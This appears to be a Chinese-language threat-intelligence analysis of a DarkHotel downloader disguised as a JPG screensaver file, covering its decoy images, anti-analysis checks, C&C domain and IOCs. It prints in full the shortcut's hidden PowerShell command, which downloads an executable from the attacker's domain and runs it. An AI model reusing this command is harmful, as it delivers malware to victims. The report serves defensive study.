DarkHotel定向攻擊樣本分析

wyzsk發表於2020-08-19
作者: 360安全衛士 · 2016/05/13 17:22

Author:360天眼實驗室

0x00 引言


人在做,天在看。

360天眼實驗室追日團隊持續發現與跟蹤APT活動,相關的樣本、IP、域名等資料只要一出現就會立即進入我們的視線。5月10日VirusTotal上有人提交了一個樣本,安博士標記為DarkHotel相關。

DarkHotel團伙在2014年被卡巴斯基做過一次暴光,但直到最近還一直非常活躍,下面我們來對VT上的這個樣本做個簡單的分析。

0x01 樣本分析


基本資訊

樣本MD5:43f3b56c1c01b007c35197c703e4d6a6
樣本大小:131,072 Bytes
編譯時間:2015-10-15 22:52:30
檔名:DSC3013.JPG.scr

樣本截圖:

詳細行為

總體來說,樣本的功能很簡單,是一個典型的下載器誘餌。得到點選執行機會以後,樣本會從自身釋放3個圖片和1個快捷方式到TEMP目錄下;呼叫mspaint開啟3個圖片中的一個檔案,執行TEMP目錄下的快捷方式,快捷方式執行起來後會啟動powershell從http://all-microsoft-control.com/kd/f.exe下載PE並執行。

樣本首先會獲取TEMP目錄的路徑:

然後拼出4個路徑:

%temp%\DSC3013.JPG
%temp%\DSC3014.JPG
%temp%\DSC3015.JPG
%temp%\desktop.lnk

會從自身檔案的0x406b20的偏移處讀取0xead位元組的資料寫入到DSC3013.JPG、DSC3014.JPG和DSC3015.JPG檔案中;

資料為JPG圖片格式檔案,如圖:

圖片是純白色背景的JPG檔案,因為這種純色檔案透過JPG格式的壓縮後佔用的空間比較小。

資料同時寫入到剛才建立的3個隱藏的圖片檔案中,CreateFile的倒數第二個引數為2,表示該檔案是隱藏的狀態。

之後會呼叫mspaint.exe開啟DSC3013.jpg檔案,因為木馬樣本的檔名為DSC3013.JPG.scr,而且木馬樣本也是圖片圖示,所以用圖片開啟DSC3013.jpg檔案迷惑受害者:

接下來會在同目錄下再建立3個不隱藏的圖片檔案,並寫入同樣的資料:

然後建立隱藏的desktop.lnk檔案,把從檔案的0x406088 處讀取到的資料寫入到該檔案,並透過ShellExecute執行起來該快捷方式檔案:

檔案的0x406088偏移處是一個快捷方式格式的檔案,如圖能看到快捷方式的引數資訊:

把該塊資料段儲存成LNK檔案,命令列引數如下:

快捷方式指向的目標為:

%COMSPEC% /c powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://all-microsoft-control.com/kd/f.exe ','%temp%\~$ER96F.doc')&&echo f|xcopy %temp%\~$ER96F.doc %temp%\dwm.exe /H /Y&&%temp%\dwm.exe

所以快捷方式被執行起來後,會呼叫powershell從http://all-microsoft-control.com/kd/f.exe下載到%temp%\~$ER96F.doc,並把該檔案重新命名為dwm.exe後,執行起來。

最後會在同目錄下生成desktop.bat,並把“del *.scr\r\ndel *.bat”程式碼寫入進去,試圖刪除掉該目錄下所有的scr和bat字尾的檔案,讓目錄看起來只有正常的圖片檔案。

遠控木馬

目前透過URL下載的dwm.exe已經失效,但從360公司海量的樣本庫中找到了這個檔案不難:

分析顯示此dwm.exe是一個使用OpenSSL協議的遠控木馬:

樣本的字串加密儲存樣本里的,關鍵API都用解密後的字串動態載入:.

sub_497036是字串的解密函式:

樣本會檢測虛擬機器、沙箱和殺軟:

卡巴

沙箱檢測:

檢測360的產品:

檢測金山和baidu的安全產品:

檢測透過後,會連線C&C地址的80埠,走SSL通訊協議,把請求的資料包加密放到URL裡,然後進行通訊:

C&C域名為:view-drama-online.com

相關分析

使用高階賬號查詢360威脅情報中心,樣本涉及的域名 all-microsoft-control.com 其實早就被內部分析團隊打上了相關的標籤,而外部的大部分威脅情報平臺對此域名沒有做什麼惡意性標記:

域名註冊於2015年7月26日,在卡巴斯基在2014年的揭露報告以後註冊,由此可見APT團伙在被公開以後並不會停止活動,根據我們的分析甚至手法上都沒有大的改變。

雖然目前我們從那個域名已經下載不到 .EXE 的進一步惡意程式碼,但威脅情報中心包含的同源樣本沙箱日誌記錄告訴我們還有多個歷史下載路徑:

事實上,利用360威脅情報中心的基礎資料,從一個域名、樣本出發我們可以把DarkHotel團伙相關的很大一部分所使用的工具和網路基礎設施資訊關聯出來,在此基礎上分析其活動歷史,甚至最終定位到幕後的來源。

關聯組織

360公司內部的長期跟蹤了代號為APT-C-06的境外APT組織,其主要目標除了中國,還有其他國家,主要目的是竊取敏感資料資訊,DarkHotel的活動可以視為APT-C-06組織一系列活動之一。在針對中國地區的攻擊中,該組織主要針對政府、科研領域進行攻擊,且非常專注於某特定領域,相關攻擊行動最早可以追溯到2007年,至今還非常活躍。

該組織多次利用0day漏洞發動攻擊,進一步使用的惡意程式碼非常複雜,相關功能模組達到數十種,涉及惡意程式碼數量超過200個。該組織主要針對Windows系統進行攻擊,近期還會對基於Android系統的移動裝置進行攻擊。另外該組織進行載荷投遞的方式除了傳統的魚叉郵件和水坑式攻擊等常見手法,還主要基於另一種特殊的攻擊手法。

我們將APT-C-06組織和其他APT組織的TTPs(戰術、技術與步驟)進行了對比分析,該組織無論是整體實力還是威脅等級在現有的APT組織中都是屬於很高的級別。從我們掌握的證據來看該組織有可能是由境外政府支援的駭客團體或情報機構。

0x02 IOC


型別
Downloader Domain all-microsoft-control.com
C&C Domain view-drama-online.com
本文章來源於烏雲知識庫,此映象為了方便大家學習研究,文章版權歸烏雲知識庫!

相關文章